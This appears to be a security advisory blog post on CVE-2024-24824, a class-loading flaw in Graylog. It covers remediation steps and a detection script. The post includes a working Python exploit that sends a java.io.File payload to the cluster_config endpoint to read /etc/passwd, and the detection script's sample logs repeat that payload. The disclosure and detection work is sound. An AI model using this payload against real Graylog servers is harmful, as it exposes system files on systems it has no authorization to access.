CVE-2024-24824: Graylog Arbitrary Class Loading Leading to Information Exposure and Remote Code Execution

Graylog is a free and open-source log management platform that simplifies collecting, storing, and analyzing logs from various sources. A recently disclosed vulnerability, CVE-2024-24824, affects Graylog versions 2.0.0 up to 5.1.10 and 5.2.0 up to 5.2.3. It allows an attacker to load arbitrary classes and instantiate them through an HTTP PUT request to the /api/system/cluster_config/ endpoint.

If exploited by a user with the required permissions, this vulnerability can lead to information exposure and remote code execution, so Graylog users should update to version 5.1.11 or 5.2.4, which contain a fix for this issue.

In this post, we dive into the details of CVE-2024-24824, examining the possible exploit, providing a code snippet and links to the original references, and outlining the steps to remediate the vulnerability.

Exploit Details

When a user with the required permissions performs an HTTP PUT request to the /api/system/cluster_config/ endpoint, Graylog's cluster config system attempts to validate that the requested class exists before using it. To do this, it loads the class through the class loader, which lets arbitrary classes with a single-argument String constructor be instantiated. Any code that runs during instantiation of such a class is therefore executed.

A particular case of this vulnerability involves java.io.File. When a File object is instantiated with the supplied path and the internal web-server stack processes the request, the entire contents of the file are included in the response to the REST request, causing information exposure.

Code Snippet

Here is a simple code snippet demonstrating the exploitation of CVE-2024-24824 using Python's requests library:

import requests

# Replace with your Graylog URL, API Key, and target file path
graylog_url = "https://yourgraylogurl.com"
api_key = "yourapikey"
target_file = "/etc/passwd"

headers = {
    "X-Requested-By": "CVE-2024-24824",
    "Authorization": f"Bearer {api_key}",
    "Content-Type": "application/json",
    "Accept": "application/json",
}

payload = f'{{"java.io.File":"{target_file}"}}'

response = requests.put(
    f"{graylog_url}/api/system/cluster_config/",
    headers=headers,
    data=payload,
)

if response.status_code == 200:
    print("Vulnerability exploited successfully. File contents:")
    print(response.text)
else:
    print("Failed to exploit vulnerability.", response.text)

Original References

The original CVE details can be found on the CVE website and in the National Vulnerability Database.

Further information on the Graylog vulnerability, including the fix commit, can be found in the Graylog GitHub repository.

Remediation

To remediate CVE-2024-24824, Graylog users should upgrade their installations to version 5.1.11 or 5.2.4. These versions contain a fix that prevents the arbitrary class loading and the resulting information exposure.

Additionally, limit access to your Graylog instance, and in particular restrict which users hold the permissions required to make HTTP PUT requests to the /api/system/cluster_config/ endpoint.
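Until the upgrade is rolled out, requests against this endpoint are worth watching. The following Python script is an added example, not code from the original post or from the Graylog project: it scans proxy-logged requests and flags PUTs to /api/system/cluster_config/ that name a class outside Graylog's own packages, whether the class appears as a path segment or as the body key used in the snippet above. The JSON log format, its field names, the trusted package prefixes and the sample records are constructed assumptions.

```python
import json
from typing import NamedTuple

ENDPOINT = "/api/system/cluster_config/"
# Assumption: legitimate cluster config classes live in Graylog's own packages.
TRUSTED_PREFIXES = ("org.graylog.", "org.graylog2.")


class Finding(NamedTuple):
    line_no: int
    src: str
    class_name: str
    status: int


def class_name_from_request(path: str, body: str):
    """Class the PUT asks Graylog to load: a trailing path segment or, as in
    the PoC above, the single top-level key of the JSON body; None if neither."""
    tail = path[len(ENDPOINT):].strip("/")
    if tail:
        return tail
    try:
        doc = json.loads(body) if body else None
    except json.JSONDecodeError:
        return None
    return next(iter(doc)) if isinstance(doc, dict) and len(doc) == 1 else None


def find_untrusted_cluster_config_puts(log_lines):
    """Flag PUTs to the endpoint naming a class outside the trusted packages.
    The status is kept so rejected (4xx) probes surface alongside 200s."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed proxy record: skip rather than abort the scan
        if rec.get("method") != "PUT" or not rec.get("path", "").startswith(ENDPOINT):
            continue
        cls = class_name_from_request(rec["path"], rec.get("body", ""))
        if cls and not cls.startswith(TRUSTED_PREFIXES):
            findings.append(Finding(n, rec.get("src", "?"), cls, int(rec.get("status", 0))))
    return findings


# Constructed sample: a reverse proxy writing one JSON record per request with
# the body captured. Field names, addresses and the config class are made up.
SAMPLE_LOG = [
    '{"src":"10.0.0.5","method":"PUT","path":"/api/system/cluster_config/org.graylog2.placeholder.ExampleConfig","status":202,"body":"{\\"enabled\\":true}"}',
    '{"src":"10.0.0.9","method":"PUT","path":"/api/system/cluster_config/","status":200,"body":"{\\"java.io.File\\":\\"/etc/passwd\\"}"}',
    '{"src":"10.0.0.9","method":"PUT","path":"/api/system/cluster_config/java.io.File","status":400,"body":"\\"/etc/passwd\\""}',
    '{"src":"10.0.0.5","method":"GET","path":"/api/system/cluster_config/","status":200,"body":""}',
]
```

Running find_untrusted_cluster_config_puts(SAMPLE_LOG) returns two findings from 10.0.0.9, both naming java.io.File: the body-keyed request that succeeded (HTTP 200) and the path-keyed one that was rejected (HTTP 400); the legitimate config update and the GET are ignored.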

In conclusion, users of Graylog versions 2.0.0 up to 5.1.10 and 5.2.0 up to 5.2.3 should promptly update to the patched versions 5.1.11 or 5.2.4. This update resolves CVE-2024-24824, protecting users from the potential information exposure and remote code execution risks. With these steps, organizations can continue to use Graylog to manage their log data safely and efficiently.

Timeline

Published on: 02/07/2024 18:15:55 UTC
Last modified on: 02/15/2024 15:40:51 UTC